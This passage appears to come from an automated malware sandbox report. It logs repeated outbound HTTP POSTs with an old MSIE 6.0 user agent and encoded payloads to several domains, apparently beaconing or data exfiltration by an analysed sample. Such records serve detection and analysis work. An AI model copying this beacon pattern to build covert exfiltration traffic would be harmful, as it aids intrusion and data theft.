30 6d 4c 49 33 39 62 6a 72 50 36 71 58 52 6e 4d 79 47 55 2b 6a 6d 75 42 58 62 50 69 4f 75 4c 5a 63 5a 52 31 39 34 35 43 50 73 36 79 2b 54 44 73 45 41 48 65 6d 61 63 78 56 58 6d 77 48 5a 35 42 47 6c 4a 54 35 46 68 6d 6d 41 73 4a 68 54 79 64 4f 38 56 4e 33 41 58 4c 6e 31 4a 67 43 4b 35 4b 34 4e 4a 33 74 77 2b 41 46 32 65 55 36 6e 55 76 67 42 4a 45 77 75 76 6c 59 75 39 4b 38 56 71 70 62 49 6d 39 77 30 47 4b 46 63 50 42 76 79 70 42 54 31 5a 32 6e 31 42 54 46 58 2b 4b 50 68 4b 43 77 35 62 39 58 56 4a 63 6f 64 6a 79 2b 6e 39 37 47 7a 51 56 61 4c 5a 76 68 6b 51 41 6e 63 46 49 55 68 73 37 75 45 58 55 78 46 67 73 61 4f 44 52 64 6c 6c 55 71 69 47 34 55 65 6b 31 78 6d 79 4d 67 38 69 52 54 67 63 31 44 44 62 2f 6a 76 74 72 41 39 43 32 68 6c 62 33 54 6a 64 70 63 51 38 7a 79 6b 46 36 6d 44 4f 52 6d 51 34 75 50 4d 33 53 47 4e 50 77 57 42 4a 75 62 50 7a 4d Data Ascii: bgihPvpJD9iAZx7pnVEZhj3VrQxqoeApzmuMmC3PP6abfpdmHNsDSITUbUaY6zgWNvmOVe6PuxywiZUDZXb6c9YrwBGIVg82yM4YmDB3mcY1/WaYd0cXcagUIpwGDnhNVGTyRF6lLe2bUpKBWdIGWZdErd+yIEr8EUOAaX6ZdzqOUQMWrCCIbYCr2lkhzv6RpDpqrTS//3LMO+aWSXd1lBfx31c9Dra/sDZSDH9yh9mhPniw7QUXhaYjCI6zAGWKbGs5zBtRr4e07Ds4/CZyr/LDHSS6CCuaspBvuKFzX+IPTOchIncX0mLI39bjrP6qXRnMyGU+jmuBXbPiOuLZcZR1945CPs6y+TDsEAHemacxVXmwHZ5BGlJT5FhmmAsJhTydO8VN3AXLn1JgCK5K4NJ3tw+AF2eU6nUvgBJEwuvlYu9K8VqpbIm9w0GKFcPBvypBT1Z2n1BTFX+KPhKCw5b9XVJcodjy+n97GzQVaLZvhkQAncFIUhs7uEXUxFgsaODRdllUqiG4Uek1xmyMg8iRTgc1DDb/jvtrA9C2hlb3TjdpcQ8zykF6mDORmQ4uPM3SGNPwWBJubPzM
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 548User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.sjbs.orgCache-Control: no-cacheData Raw: 35 49 6b 4f 54 46 39 70 42 39 67 74 5a 51 72 32 76 69 63 53 63 2b 6a 65 32 69 4d 31 61 56 4c 56 41 78 38 6e 33 4f 78 4f 35 32 51 63 78 73 74 70 4b 7a 64 47 4b 75 6f 4b 2b 4d 34 74 43 58 4c 76 58 65 79 4b 38 58 6a 35 69 79 49 54 43 62 67 48 35 39 57 71 6e 39 64 74 76 4e 36 59 76 73 72 53 50 78 6b 75 67 73 30 7a 49 31 57 62 65 36 30 6e 49 55 68 6b 33 6b 52 73 79 48 49 43 62 71 6c 6a 39 63 6d 66 43 73 77 77 47 69 52 61 55 35 71 4f 6d 46 69 74 31 73 77 62 4b 4d 68 63 6f 44 4e 64 45 63 6a 38 78 63 50 4d 6b 7a 56 44 6b 61 70 2b 32 34 56 6b 47 6c 43 51 63 61 30 4c 51 76 7a 41 34 65 2f 71 47 38 6e 30 2b 53 62 56 77 33 67 2f 41 4b 67 55 4c 68 49 4f 77 41 64 5a 7a 36 56 53 73 52 6a 5a 56 65 5a 70 65 6b 50 61 6c 70 41 41 30 67 31 46 46 2f 55 57 30 4f 53 4f 43 73 52 65 4b 4b 76 71 69 67 72 58 4a 42 45 6b 4b 74 7a 46 72 67 47 66 79 30 43 59 43 46 37 69 76 71 4f 4b 57 71 4e 33 32 57 56 52 48 50 77 6d 4a 4b 63 34 6d 63 42 49 34 44 4a 43 63 4f 47 46 4f 4e 56 46 6b 30 4d 48 56 6d 59 79 56 53 79 4c 32 30 67 4b 67 45 35 68 2f 70 63 37 69 31 66 5a 61 48 35 72 76 6f 77 50 6a 36 42 4a 74 6e 4f 65 4d 6a 44 74 30 42 2f 57 6d 53 4f 47 57 5a 68 63 35 35 66 78 70 6a 6b 55 36 41 53 66 42 75 36 71 4b 4e 77 2b 77 45 5a 6b 44 64 57 72 68 79 74 78 4e 30 37 31 51 53 38 70 4f 51 73 75 33 74 67 66 62 7a 30 36 51 5a 31 4d 4c 49 6c 54 65 51 48 75 6b 71 73 6c 7a 78 52 79 4b 4d 32 4b 51 64 6d 59 6c 41 63 63 43 73 59 64 68 48 49 47 42 39 34 6f 44 35 31 36 49 32 6c 37 79 4b 71 53 6e 47 78 44 4a 46 6c 39 37 76 68 4f 66 2b 57 71 6c 55 41 58 5a 57 77 4d 62 70 70 59 70 34 64 65 76 38 68 33 72 61 4b 75 44 30 57 69 69 39 5a 51 4d 47 32 4e 44 6e 57 58 68 57 59 52 Data Ascii: 5IkOTF9pB9gtZQr2vicSc+je2iM1aVLVAx8n3OxO52QcxstpKzdGKuoK+M4tCXLvXeyK8Xj5iyITCbgH59Wqn9dtvN6YvsrSPxkugs0zI1Wbe60nIUhk3kRsyHICbqlj9cmfCswwGiRaU5qOmFit1swbKMhcoDNdEcj8xcPMkzVDkap+24VkGlCQca0LQvzA4e/qG8n0+SbVw3g/AKgULhIOwAdZz6VSsRjZVeZpekPalpAA0g1FF/UW0OSOCsReKKvqigrXJBEkKtzFrgGfy0CYCF7ivqOKWqN32WVRHPwmJKc4mcBI4DJCcOGFONVFk0MHVmYyVSyL20gKgE5h/pc7i1fZaH5rvowPj6BJtnOeMjDt0B/WmSOGWZhc55fxpjkU6ASfBu6qKNw+wEZkDdWrhytxN071QS8pOQsu3tgfbz06QZ1MLIlTeQHukqslzxRyKM2KQdmYlAccCsYdhHIGB94oD516I2l7yKqSnGxDJFl97vhOf+WqlUAXZWwMbppYp4dev8h3raKuD0Wii9ZQMG2NDnWXhWYR
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.snugpak.comCache-Control: no-cacheData Raw: 4c 76 48 58 57 66 45 63 4b 64 68 59 6a 73 44 46 45 48 47 57 61 30 72 69 6b 72 77 76 55 5a 55 38 74 59 70 4a 57 6b 76 5a 54 59 35 66 78 7a 62 2b 39 6f 46 6d 61 63 43 64 52 35 74 6b 33 34 35 2b 64 61 64 55 44 5a 6a 53 79 65 7a 6c 52 4a 47 2b 6f 70 61 4d 64 61 6e 59 2b 51 54 49 55 51 4f 50 51 6f 77 63 4a 6e 70 48 63 78 64 4c 31 78 52 59 51 46 4a 4c 48 59 30 4e 55 71 74 6f 69 33 65 4b 5a 77 56 54 62 75 37 2f 36 73 72 6e 6a 6f 4e 47 42 5a 4e 73 70 69 6a 53 4b 59 4e 62 37 57 77 52 2b 4e 69 54 57 61 46 2b 61 67 4a 50 34 35 45 50 63 78 4c 76 51 74 35 32 37 38 48 78 73 77 44 37 57 56 50 55 49 6e 4f 59 54 5a 58 55 77 69 31 6f 62 54 2f 50 48 71 6c 43 57 48 69 58 6e 6d 6b 61 4f 74 78 64 68 73 73 4c 2b 6d 35 77 4d 71 69 5a 44 6b 4f 4a 71 34 67 49 5a 31 53 4c 69 70 66 6b 43 35 65 6f 41 53 36 6b 57 48 70 6e 32 79 33 79 44 33 69 64 48 64 54 61 65 75 48 6e 6a 64 6a 50 49 4a 41 67 4e 7a 50 66 66 48 6e 71 54 39 64 36 44 37 43 4f 31 56 6c 4a 36 45 30 34 4a 2b 7a 34 2f 4a 47 61 6f 32 56 57 63 32 6a 4f 55 4b 55 4a 7a 2f 54 78 67 4e 70 74 34 56 65 58 63 37 79 53 65 35 2b 74 4c 2f 45 58 37 69 65 37 4d 4d 43 48 78 57 39 55 77 78 72 32 74 63 48 62 6f 4b 69 31 58 75 43 54 34 41 76 70 6a 5a 62 59 38 4c 54 54 31 2b 4b 33 72 31 56 7a 6e 49 57 78 54 51 52 2f 36 2f 36 70 73 4a 6f 74 37 43 75 77 59 4b 53 51 31 64 6b 33 75 55 55 46 6d 75 55 50 6d 6d 58 71 74 71 4a 68 72 56 71 4f 46 41 79 7a 35 45 54 41 52 62 36 58 56 4a 69 4e 51 31 35 37 64 59 4f 5a 77 66 36 77 31 6a 57 62 2b 6e 56 2b 74 53 79 4e 54 73 47 79 44 4b 7a 69 66 39 6a 46 4f 6c 52 59 37 45 59 4c 47 4b 6c 61 4b 48 7a 49 6a 6d 73 42 57 56 59 52 47 53 77 4c 45 39 34 6f 4d 50 30 53 68 75 32 69 54 50 4f 34 59 41 2f 32 Data Ascii: LvHXWfEcKdhYjsDFEHGWa0rikrwvUZU8tYpJWkvZTY5fxzb+9oFmacCdR5tk345+dadUDZjSyezlRJG+opaMdanY+QTIUQOPQowcJnpHcxdL1xRYQFJLHY0NUqtoi3eKZwVTbu7/6srnjoNGBZNspijSKYNb7WwR+NiTWaF+agJP45EPcxLvQt5278HxswD7WVPUInOYTZXUwi1obT/PHqlCWHiXnmkaOtxdhssL+m5wMqiZDkOJq4gIZ1SLipfkC5eoAS6kWHpn2y3yD3idHdTaeuHnjdjPIJAgNzPffHnqT9d6D7CO1VlJ6E04J+z4/JGao2VWc2jOUKUJz/TxgNpt4VeXc7ySe5+tL/EX7ie7MMCHxW9Uwxr2tcHboKi1XuCT4AvpjZbY8LTT1+K3r1VznIWxTQR/6/6psJot7CuwYKSQ1dk3uUUFmuUPmmXqtqJhrVqOFAyz5ETARb6XVJiNQ157dYOZwf6w1jWb+nV+tSyNTsGyDKzif9jFOlRY7EYLGKlaKHzIjmsBWVYRGSwLE94oMP0Shu2iTPO4YA/2
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.valselit.comCache-Control: no-cacheData Raw: 74 78 56 67 56 32 74 51 6f 78 42 48 76 72 30 6f 51 71 6f 33 41 64 53 78 62 69 67 78 6d 34 48 31 7a 38 69 64 4f 69 79 2f 32 35 44 73 4a 33 6b 53 56 4c 48 31 56 7a 42 61 48 35 4c 45 56 65 6f 4c 51 46 48 65 73 42 36 6a 51 31 31 5a 30 57 61 6c 42 39 78 55 74 36 4e 49 71 5a 75 47 36 75 6f 56 64 5a 48 66 37 58 6c 69 41 4c 67 62 57 35 6c 73 69 66 4d 56 54 70 4e 46 54 62 77 7a 6c 71 45 4c 46 50 35 4a 59 52 61 6a 72 6f 50 6d 70 63 62 50 68 58 33 61 41 33 2b 4b 7a 66 73 4c 51 57 64 77 44 70 43 44 74 37 41 2f 68 38 67 61 47 63 6c 59 74 55 75 37 45 75 34 55 58 50 47 72 37 67 76 41 55 39 65 6c 75 4a 55 4f 74 35 68 36 78 6c 59 78 6a 4f 76 69 48 79 4f 53 66 59 44 53 37 33 36 45 6e 68 72 46 6c 44 52 46 4b 53 50 77 51 4a 62 31 4e 53 4e 34 70 54 4d 79 49 4d 37 55 59 49 54 4e 67 66 4a 6c 32 70 34 57 70 4d 38 45 2b 6e 4f 37 6b 2f 52 57 69 6d 45 78 50 6c 64 58 43 41 47 78 67 4e 6b 34 32 46 61 38 62 43 72 63 53 2f 42 61 68 71 35 51 72 6f 52 50 56 42 46 5a 49 2f 62 66 58 59 72 69 65 72 50 47 4b 38 6f 32 61 46 72 63 78 44 4d 4c 77 35 46 7a 58 61 56 4b 41 59 2f 58 67 39 42 2b 30 76 38 4f 77 55 5a 77 30 57 61 6d 55 44 78 52 6d 64 69 2f 6d 4c 41 2f 66 74 44 38 39 32 35 33 4a 30 48 30 30 2b 65 67 4e 6c 42 4b 32 68 4b 38 73 73 7a 49 54 52 46 37 77 6e 61 59 46 61 44 55 53 4a 72 52 69 76 2f 6c 74 37 47 32 73 33 2f 35 30 78 7a 43 2f 4d 66 59 55 39 72 6c 4a 52 63 79 74 73 77 37 47 4e 6b 55 6a 33 47 79 6b 74 66 53 47 7a 53 75 63 32 70 33 52 43 5a 46 52 68 39 6f 46 47 74 4b 71 58 48 6f 41 57 61 67 51 74 6e 39 7a 4d 38 4b 69 32 45 43 37 55 66 4c 56 58 4e 63 37 41 63 37 71 73 32 68 5a 67 4e 76 78 73 2f 68 36 61 6c 47 58 53 31 37 44 55 67 6e 4b 38 44 65 69 6c 38 4c 64 72 61 30 41 4c 57 63 50 53 55 3d Data Ascii: txVgV2tQoxBHvr0oQqo3AdSxbigxm4H1z8idOiy/25DsJ3kSVLH1VzBaH5LEVeoLQFHesB6jQ11Z0WalB9xUt6NIqZuG6uoVdZHf7XliALgbW5lsifMVTpNFTbwzlqELFP5JYRajroPmpcbPhX3aA3+KzfsLQWdwDpCDt7A/h8gaGclYtUu7Eu4UXPGr7gvAU9eluJUOt5h6xlYxjOviHyOSfYDS736EnhrFlDRFKSPwQJb1NSN4pTMyIM7UYITNgfJl2p4WpM8E+nO7k/RWimExPldXCAGxgNk42Fa8bCrcS/Bahq5QroRPVBFZI/bfXYrierPGK8o2aFrcxDMLw5FzXaVKAY/Xg9B+0v8OwUZw0WamUDxRmdi/mLA/ftD89253J0H00+egNlBK2hK8sszITRF7wnaYFaDUSJrRiv/lt7G2s3/50xzC/MfYU9rlJRcytsw7GNkUj3GyktfSGzSuc2p3RCZFRh9oFGtKqXHoAWagQtn9zM8Ki2EC7UfLVXNc7Ac7qs2hZgNvxs/h6alGXS17DUgnK8Deil8Ldra0ALWcPSU=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.dayvo.comCache-Control: no-cacheData Raw: 65 6c 46 64 56 31 52 51 6f 78 43 69 64 6e 77 58 4c 33 2f 76 2f 71 64 69 58 68 4c 4d 6c 2f 45 31 79 44 71 70 59 4f 63 77 5a 55 35 33 43 58 55 53 58 39 36 46 37 70 45 2f 56 4a 51 31 68 79 6e 56 52 69 63 50 54 78 53 66 6e 46 69 50 49 73 4d 32 79 50 6d 55 31 31 37 49 73 54 78 6d 69 67 78 33 36 42 68 65 5a 2b 4f 52 48 4a 67 50 42 4f 34 6c 35 41 71 64 4a 64 73 2f 4e 4c 48 53 6f 33 46 55 53 69 45 37 30 63 41 4f 72 55 74 76 31 35 47 49 38 57 72 6d 6a 44 2b 58 75 4f 47 52 34 6c 39 4c 64 36 58 6f 38 41 7a 68 45 6a 66 78 71 54 2b 51 66 5a 47 51 66 63 64 45 6d 30 6a 4e 37 77 44 6f 4f 39 6b 34 50 75 53 36 7a 38 4d 49 65 52 44 59 46 36 45 38 73 4a 43 6e 62 33 7a 58 72 71 74 62 6f 35 57 72 4a 41 46 61 47 6d 78 42 35 6a 46 49 45 35 56 7a 4c 72 33 30 64 68 7a 30 39 55 61 66 34 64 4b 73 49 41 45 52 66 71 4c 52 35 47 44 32 4b 32 6b 7a 42 61 78 6c 4e 73 6d 34 4c 6c 2b 41 41 46 79 6b 35 46 47 55 48 2f 32 34 38 4b 66 33 46 75 76 56 32 79 73 74 45 46 57 72 2f 72 6c 5a 2b 69 33 56 4e 48 49 6e 79 68 56 44 70 72 69 32 39 5a 55 6e 32 41 38 4c 63 4e 75 42 76 50 46 68 74 6a 42 77 4d 37 43 67 50 57 58 65 68 53 2b 7a 37 55 52 52 39 6b 75 77 77 34 41 2f 56 46 70 66 70 34 4d 52 76 58 46 76 42 32 38 37 73 79 53 4f 30 42 2b 56 79 36 49 4e 4d 64 4e 4f 4d 41 2b 69 51 2b 45 65 79 77 43 69 58 30 51 77 6f 31 68 6d 61 4c 72 4d 76 46 78 56 52 62 48 67 74 6b 64 6f 33 4f 2f 52 44 67 38 56 73 4d 34 31 58 63 72 4b 62 4a 54 4b 63 57 54 62 7a 65 32 7a 37 4e 48 72 75 56 78 32 5a 41 62 45 64 6b 41 6d 67 59 6d 72 76 77 64 74 6f 48 6e 57 6d 58 59 5a 4f 34 71 46 43 69 35 58 49 79 66 6e 73 69 75 68 71 43 32 44 73 66 76 50 77 50 77 48 32 66 36 70 57 4f 73 77 58 52 67 77 42 69 48 49 77 51 3d 3d Data Ascii: elFdV1RQoxCidnwXL3/v/qdiXhLMl/E1yDqpYOcwZU53CXUSX96F7pE/VJQ1hynVRicPTxSfnFiPIsM2yPmU117IsTxmigx36BheZ+ORHJgPBO4l5AqdJds/NLHSo3FUSiE70cAOrUtv15GI8WrmjD+XuOGR4l9Ld6Xo8AzhEjfxqT+QfZGQfcdEm0jN7wDoO9k4PuS6z8MIeRDYF6E8sJCnb3zXrqtbo5WrJAFaGmxB5jFIE5VzLr30dhz09Uaf4dKsIAERfqLR5GD2K2kzBaxlNsm4Ll+AAFyk5FGUH/248Kf3FuvV2ystEFWr/rlZ+i3VNHInyhVDpri29ZUn2A8LcNuBvPFhtjBwM7CgPWXehS+z7URR9kuww4A/VFpfp4MRvXFvB287sySO0B+Vy6INMdNOMA+iQ+EeywCiX0Qwo1hmaLrMvFxVRbHgtkdo3O/RDg8VsM41XcrKbJTKcWTbze2z7NHruVx2ZAbEdkAmgYmrvwdtoHnWmXYZO4qFCi5XIyfnsiuhqC2DsfvPwPwH2f6pWOswXRgwBiHIwQ==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.dayvo.comCache-Control: no-cacheData Raw: 65 6c 46 64 56 31 52 51 6f 78 43 69 64 6e 77 58 4c 33 2f 76 2f 71 64 69 58 68 4c 4d 6c 2f 45 31 79 44 71 70 59 4f 63 77 5a 55 35 33 43 58 55 53 58 39 36 46 37 70 45 2f 56 4a 51 31 68 79 6e 56 52 69 63 50 54 78 53 66 6e 46 69 50 49 73 4d 32 79 50 6d 55 31 31 37 49 73 54 78 6d 69 67 78 33 36 42 68 65 5a 2b 4f 52 48 4a 67 50 42 4f 34 6c 35 41 71 64 4a 64 73 2f 4e 4c 48 53 6f 33 46 55 53 69 45 37 30 63 41 4f 72 55 74 76 31 35 47 49 38 57 72 6d 6a 44 2b 58 75 4f 47 52 34 6c 39 4c 64 36 58 6f 38 41 7a 68 45 6a 66 78 71 54 2b 51 66 5a 47 51 66 63 64 45 6d 30 6a 4e 37 77 44 6f 4f 39 6b 34 50 75 53 36 7a 38 4d 49 65 52 44 59 46 36 45 38 73 4a 43 6e 62 33 7a 58 72 71 74 62 6f 35 57 72 4a 41 46 61 47 6d 78 42 35 6a 46 49 45 35 56 7a 4c 72 33 30 64 68 7a 30 39 55 61 66 34 64 4b 73 49 41 45 52 66 71 4c 52 35 47 44 32 4b 32 6b 7a 42 61 78 6c 4e 73 6d 34 4c 6c 2b 41 41 46 79 6b 35 46 47 55 48 2f 32 34 38 4b 66 33 46 75 76 56 32 79 73 74 45 46 57 72 2f 72 6c 5a 2b 69 33 56 4e 48 49 6e 79 68 56 44 70 72 69 32 39 5a 55 6e 32 41 38 4c 63 4e 75 42 76 50 46 68 74 6a 42 77 4d 37 43 67 50 57 58 65 68 53 2b 7a 37 55 52 52 39 6b 75 77 77 34 41 2f 56 46 70 66 70 34 4d 52 76 58 46 76 42 32 38 37 73 79 53 4f 30 42 2b 56 79 36 49 4e 4d 64 4e 4f 4d 41 2b 69 51 2b 45 65 79 77 43 69 58 30 51 77 6f 31 68 6d 61 4c 72 4d 76 46 78 56 52 62 48 67 74 6b 64 6f 33 4f 2f 52 44 67 38 56 73 4d 34 31 58 63 72 4b 62 4a 54 4b 63 57 54 62 7a 65 32 7a 37 4e 48 72 75 56 78 32 5a 41 62 45 64 6b 41 6d 67 59 6d 72 76 77 64 74 6f 48 6e 57 6d 58 59 5a 4f 34 71 46 43 69 35 58 49 79 66 6e 73 69 75 68 71 43 32 44 73 66 76 50 77 50 77 48 32 66 36 70 57 4f 73 77 58 52 67 77 42 69 48 49 77 51 3d 3d Data Ascii: elFdV1RQoxCidnwXL3/v/qdiXhLMl/E1yDqpYOcwZU53CXUSX96F7pE/VJQ1hynVRicPTxSfnFiPIsM2yPmU117IsTxmigx36BheZ+ORHJgPBO4l5AqdJds/NLHSo3FUSiE70cAOrUtv15GI8WrmjD+XuOGR4l9Ld6Xo8AzhEjfxqT+QfZGQfcdEm0jN7wDoO9k4PuS6z8MIeRDYF6E8sJCnb3zXrqtbo5WrJAFaGmxB5jFIE5VzLr30dhz09Uaf4dKsIAERfqLR5GD2K2kzBaxlNsm4Ll+AAFyk5FGUH/248Kf3FuvV2ystEFWr/rlZ+i3VNHInyhVDpri29ZUn2A8LcNuBvPFhtjBwM7CgPWXehS+z7URR9kuww4A/VFpfp4MRvXFvB287sySO0B+Vy6INMdNOMA+iQ+EeywCiX0Qwo1hmaLrMvFxVRbHgtkdo3O/RDg8VsM41XcrKbJTKcWTbze2z7NHruVx2ZAbEdkAmgYmrvwdtoHnWmXYZO4qFCi5XIyfnsiuhqC2DsfvPwPwH2f6pWOswXRgwBiHIwQ==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.c9dd.comCache-Control: no-cacheData Raw: 79 72 50 72 57 45 55 56 4b 64 6a 69 70 76 77 73 62 49 57 37 71 4c 37 39 4b 35 67 54 59 6a 68 34 53 51 59 4d 70 34 5a 4c 4f 6b 79 7a 71 56 30 52 65 59 79 67 56 53 68 76 54 70 56 38 79 2f 31 7a 55 65 49 4f 4e 6d 37 73 46 35 6d 4d 56 42 55 62 4a 59 51 79 4e 5a 48 50 5a 53 31 37 44 5a 45 7a 36 4d 47 45 6c 49 34 71 58 66 48 77 50 51 47 6f 6b 47 63 4d 66 71 46 6d 53 36 32 48 34 39 4d 6f 62 77 54 38 51 56 66 54 38 30 57 6b 6d 78 70 6b 36 4d 43 4e 41 39 2b 30 59 54 6b 39 72 4a 43 42 73 76 67 45 64 45 73 32 6f 79 2f 4a 34 72 47 35 4b 6d 48 6e 70 4a 42 70 35 38 75 73 34 78 5a 4d 70 62 58 57 5a 65 37 6e 71 36 55 76 54 5a 36 62 72 4c 36 55 42 43 35 52 4b 33 5a 2b 4f 73 33 56 59 68 4c 58 31 53 62 48 39 54 77 42 45 2b 44 43 43 54 44 63 32 68 37 35 50 56 63 6e 49 52 43 34 71 50 69 75 30 47 6b 59 76 62 58 46 54 4b 38 33 42 6b 62 30 61 55 55 61 6c 4a 39 71 76 31 56 2b 4f 32 32 61 71 38 6d 4c 4b 73 6a 58 6e 58 6c 50 6f 55 78 36 6b 4e 71 46 4e 50 68 2f 43 77 67 67 6f 78 34 74 5a 37 4e 55 6f 43 71 34 4f 35 70 68 55 6f 6c 59 73 71 65 44 38 47 54 41 6c 36 6d 5a 6e 34 31 75 4a 75 48 58 47 33 69 59 6e 39 48 36 6a 48 70 50 54 70 31 43 6c 63 5a 4b 2b 79 4b 38 38 65 73 44 6b 39 63 74 48 41 38 51 44 6f 65 63 57 70 34 44 32 71 76 35 66 73 42 2b 45 6c 71 38 41 33 73 2f 4e 2b 31 35 6a 4e 4e 75 37 51 64 61 42 70 2f 30 46 39 31 34 72 35 68 44 64 51 77 38 6c 47 4d 62 46 68 39 70 54 68 43 74 65 77 71 4d 77 6d 37 76 45 57 68 31 66 31 50 36 6f 34 46 4a 34 31 6c 46 51 73 51 4e 58 51 70 61 36 64 51 70 47 5a 74 76 31 75 53 6c 6c 67 4a 68 57 57 37 6c 35 63 63 73 7a 69 4b 46 34 55 79 67 74 39 64 50 2f 39 37 63 57 61 4e 53 64 32 5a 49 68 64 73 51 7a 69 55 53 79 73 45 72 61 2b 50 57 39 7a 65 45 6c 74 55 39 36 79 59 65 42 76 78 46 76 2b 4d 3d Data Ascii: yrPrWEUVKdjipvwsbIW7qL79K5gTYjh4SQYMp4ZLOkyzqV0ReYygVShvTpV8y/1zUeIONm7sF5mMVBUbJYQyNZHPZS17DZEz6MGElI4qXfHwPQGokGcMfqFmS62H49MobwT8QVfT80Wkmxpk6MCNA9+0YTk9rJCBsvgEdEs2oy/J4rG5KmHnpJBp58us4xZMpbXWZe7nq6UvTZ6brL6UBC5RK3Z+Os3VYhLX1SbH9TwBE+DCCTDc2h75PVcnIRC4qPiu0GkYvbXFTK83Bkb0aUUalJ9qv1V+O22aq8mLKsjXnXlPoUx6kNqFNPh/Cwggox4tZ7NUoCq4O5phUolYsqeD8GTAl6mZn41uJuHXG3iYn9H6jHpPTp1ClcZK+yK88esDk9ctHA8QDoecWp4D2qv5fsB+Elq8A3s/N+15jNNu7QdaBp/0F914r5hDdQw8lGMbFh9pThCtewqMwm7vEWh1f1P6o4FJ41lFQsQNXQpa6dQpGZtv1uSllgJhWW7l5ccsziKF4Uygt9dP/97cWaNSd2ZIhdsQziUSysEra+PW9zeEltU96yYeBvxFv+M=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 592User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.netcr.comCache-Control: no-cacheData Raw: 62 67 69 68 50 76 70 4a 44 39 69 41 5a 78 37 70 6e 56 45 5a 68 6a 33 56 72 51 78 71 6f 65 41 70 7a 6d 75 4d 6d 43 33 50 50 36 61 62 66 70 64 6d 48 4e 73 44 53 49 54 55 62 55 61 59 36 7a 67 57 4e 76 6d 4f 56 65 36 50 75 78 79 77 69 5a 55 44 5a 58 62 36 63 39 59 72 77 42 47 49 56 67 38 32 79 4d 34 59 6d 44 42 33 6d 63 59 31 2f 57 61 59 64 30 63 58 63 61 67 55 49 70 77 47 44 6e 68 4e 56 47 54 79 52 46 36 6c 4c 65 32 62 55 70 4b 42 57 64 49 47 57 5a 64 45 72 64 2b 79 49 45 72 38 45 55 4f 41 61 58 36 5a 64 7a 71 4f 55 51 4d 57 72 43 43 49 62 59 43 72 32 6c 6b 68 7a 76 36 52 70 44 70 71 72 54 53 2f 2f 33 4c 4d 4f 2b 61 57 53 58 64 31 6c 42 66 78 33 31 63 39 44 72 61 2f 73 44 5a 53 44 48 39 79 68 39 6d 68 50 6e 69 77 37 51 55 58 68 61 59 6a 43 49 36 7a 41 47 57 4b 62 47 73 35 7a 42 74 52 72 34 65 30 37 44 73 34 2f 43 5a 79 72 2f 4c 44 48 53 53 36 43 43 75 61 73 70 42 76 75 4b 46 7a 58 2b 49 50 54 4f 63 68 49 6e 63 58 30 6d 4c 49 33 39 62 6a 72 50 36 71 58 52 6e 4d 79 47 55 2b 6a 6d 75 42 58 62 50 69 4f 75 4c 5a 63 5a 52 31 39 34 35 43 50 73 36 79 2b 54 44 73 45 41 48 65 6d 61 63 78 56 58 6d 77 48 5a 35 42 47 6c 4a 54 35 46 68 6d 6d 41 73 4a 68 54 79 64 4f 38 56 4e 33 41 58 4c 6e 31 4a 67 43 4b 35 4b 34 4e 4a 33 74 77 2b 41 46 32 65 55 36 6e 55 76 67 42 4a 45 77 75 76 6c 59 75 39 4b 38 56 71 70 62 49 6d 39 77 30 47 4b 46 63 50 42 76 79 70 42 54 31 5a 32 6e 31 42 54 46 58 2b 4b 50 68 4b 43 77 35 62 39 58 56 4a 63 6f 64 6a 79 2b 6e 39 37 47 7a 51 56 61 4c 5a 76 68 6b 51 41 6e 63 46 49 55 68 73 37 75 45 58 55 78 46 67 73 61 4f 44 52 64 6c 6c 55 71 69 47 34 55 65 6b 31 78 6d 79 4d 67 38 69 52 54 67 63 31 44 44 62 2f 6a 76 74 72 41 39 43 32 68 6c 62 33 54 6a 64 70 63 51 38 7a 79 6b 46 36 6d 44 4f 52 6d 51 34 75 50 4d 33 53 47 4e 50 77 57 42 4a 75 62 50 7a 4d Data Ascii: bgihPvpJD9iAZx7pnVEZhj3VrQxqoeApzmuMmC3PP6abfpdmHNsDSITUbUaY6zgWNvmOVe6PuxywiZUDZXb6c9YrwBGIVg82yM4YmDB3mcY1/WaYd0cXcagUIpwGDnhNVGTyRF6lLe2bUpKBWdIGWZdErd+yIEr8EUOAaX6ZdzqOUQMWrCCIbYCr2lkhzv6RpDpqrTS//3LMO+aWSXd1lBfx31c9Dra/sDZSDH9yh9mhPniw7QUXhaYjCI6zAGWKbGs5zBtRr4e07Ds4/CZyr/LDHSS6CCuaspBvuKFzX+IPTOchIncX0mLI39bjrP6qXRnMyGU+jmuBXbPiOuLZcZR1945CPs6y+TDsEAHemacxVXmwHZ5BGlJT5FhmmAsJhTydO8VN3AXLn1JgCK5K4NJ3tw+AF2eU6nUvgBJEwuvlYu9K8VqpbIm9w0GKFcPBvypBT1Z2n1BTFX+KPhKCw5b9XVJcodjy+n97GzQVaLZvhkQAncFIUhs7uEXUxFgsaODRdllUqiG4Uek1xmyMg8iRTgc1DDb/jvtrA9C2hlb3TjdpcQ8zykF6mDORmQ4uPM3SGNPwWBJubPzM
